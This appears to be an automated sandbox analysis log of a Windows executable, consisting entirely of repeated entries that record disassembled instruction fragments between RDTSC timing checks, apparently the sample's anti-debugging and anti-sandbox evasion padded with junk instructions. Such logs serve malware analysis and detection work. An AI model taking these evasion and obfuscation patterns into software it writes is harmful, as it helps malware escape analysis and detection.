              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB75CD second address: FB75E1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5048C0A326h 0x00000008 jl 00007F5048C0A326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB75E1 second address: FB75E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB75E5 second address: FB75FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FBF00F second address: FBF032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F50492D819Dh 0x0000000b jmp 00007F50492D81A0h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FC4C49 second address: FC4C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FC4C4F second address: FC4C57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FC54B0 second address: FC54BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5048C0A326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FC57A1 second address: FC57B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D819Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FC4705 second address: FC4709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FD98B6 second address: FD98BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FD98BB second address: FD990B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5048C0A344h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5048C0A32Bh 0x00000010 jnc 00007F5048C0A32Ch 0x00000016 jmp 00007F5048C0A32Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FD990B second address: FD990F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FD9352 second address: FD9360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jno 00007F5048C0A326h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FE13F3 second address: FE13F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FE97C9 second address: FE97CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FE9631 second address: FE963B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F50492D8196h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FE963B second address: FE964A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF049D second address: FF04B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F50492D819Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF0325 second address: FF0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F5048C0A326h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9DB9 second address: FF9DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F50492D81A1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9DD2 second address: FF9DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5048C0A331h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF87EB second address: FF880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F50492D81A5h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF8918 second address: FF8925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5048C0A326h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9024 second address: FF9045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9A67 second address: FF9A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5048C0A326h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F5048C0A335h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9A89 second address: FF9A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9A8F second address: FF9AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jno 00007F5048C0A326h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FF9AA5 second address: FF9ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007F50492D8196h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F50492D81A4h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFDB36 second address: FFDB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F5048C0A326h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFDB45 second address: FFDB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD66D second address: FFD671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD671 second address: FFD675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD675 second address: FFD681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD681 second address: FFD685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD685 second address: FFD68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD68B second address: FFD691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD691 second address: FFD69B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5048C0A32Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD69B second address: FFD6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F50492D8196h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD6B2 second address: FFD6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD6B7 second address: FFD6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD7FA second address: FFD805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5048C0A326h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD805 second address: FFD82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F50492D81A5h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD82A second address: FFD846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F5048C0A326h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD846 second address: FFD84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FFD84A second address: FFD850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 100A747 second address: 100A74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1007815 second address: 1007831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5048C0A326h 0x0000000a popad 0x0000000b jmp 00007F5048C0A32Eh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1007831 second address: 100784A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D81A1h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 101975A second address: 101975E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 101975E second address: 1019764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 101AD95 second address: 101ADAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F5048C0A326h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 101ADAC second address: 101ADC2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F50492D819Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 101D7DF second address: 101D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5048C0A326h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1032ADE second address: 1032AE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035D34 second address: 1035D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A336h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035EF2 second address: 1035EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035EF6 second address: 1035F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F5048C0A330h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035F8F second address: 1035F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035F9D second address: 1035FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5048C0A328h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035FB0 second address: 1035FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035FB4 second address: 1035FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035FC7 second address: 1035FCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1035FCC second address: 103604B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F5048C0A328h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D306Bh], edx 0x00000028 sub edx, dword ptr [ebp+1244E0F3h] 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F5048C0A328h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1B4Dh], edx 0x00000050 mov dword ptr [ebp+122D1D2Bh], edi 0x00000056 push 701DE064h 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e jmp 00007F5048C0A32Eh 0x00000063 pop ecx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 103604B second address: 1036051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1038D82 second address: 1038D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 1038D8D second address: 1038D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 103AC19 second address: 103AC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0311 second address: 56C0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0315 second address: 56C031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C031B second address: 56C0330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, cx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0330 second address: 56C036C instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F5048C0A334h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5048C0A32Eh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5048C0A32Ah 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C036C second address: 56C0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C03E7 second address: 56C03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C03FC second address: 56C0429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F50492D819Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0429 second address: 56C042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0463 second address: 56C0468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0468 second address: 56C0490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5048C0A337h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0490 second address: 56C04BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C62Ah 0x00000007 call 00007F50492D819Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F50492D81A5h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C04BE second address: 56C04D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C04D4 second address: 56C04F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C04F3 second address: 56C0529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5048C0A333h 0x0000000a or al, FFFFFFEEh 0x0000000d jmp 00007F5048C0A339h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0529 second address: 56C0569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f pushfd 0x00000010 jmp 00007F50492D819Fh 0x00000015 jmp 00007F50492D81A3h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0569 second address: 56C0581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5048C0A334h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C0672 second address: 56C06CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0A61D603h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [ebp-04h], 00000000h 0x0000000f jmp 00007F50492D81A6h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007F50492D81A0h 0x0000001c mov esi, edx 0x0000001e jmp 00007F50492D81A0h 0x00000023 mov al, byte ptr [edx] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F50492D819Ch 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C06CD second address: 56C06CD instructions: 0x00000000 rdtsc 0x00000002 mov ax, 9EB1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 inc edx 0x0000000a jmp 00007F5048C0A333h 0x0000000f test al, al 0x00000011 pushad 0x00000012 call 00007F5048C0A334h 0x00000017 mov ah, B9h 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F5048C0A32Ch 0x00000020 adc cl, 00000018h 0x00000023 jmp 00007F5048C0A32Bh 0x00000028 popfd 0x00000029 popad 0x0000002a jne 00007F5048C0A2BBh 0x00000030 mov al, byte ptr [edx] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F5048C0A32Ch 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C075A second address: 56C079B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edx, esi 0x0000000b jmp 00007F50492D81A7h 0x00000010 mov edi, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F50492D81A0h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C079B second address: 56C07AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: 56C07AA second address: 56C07B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
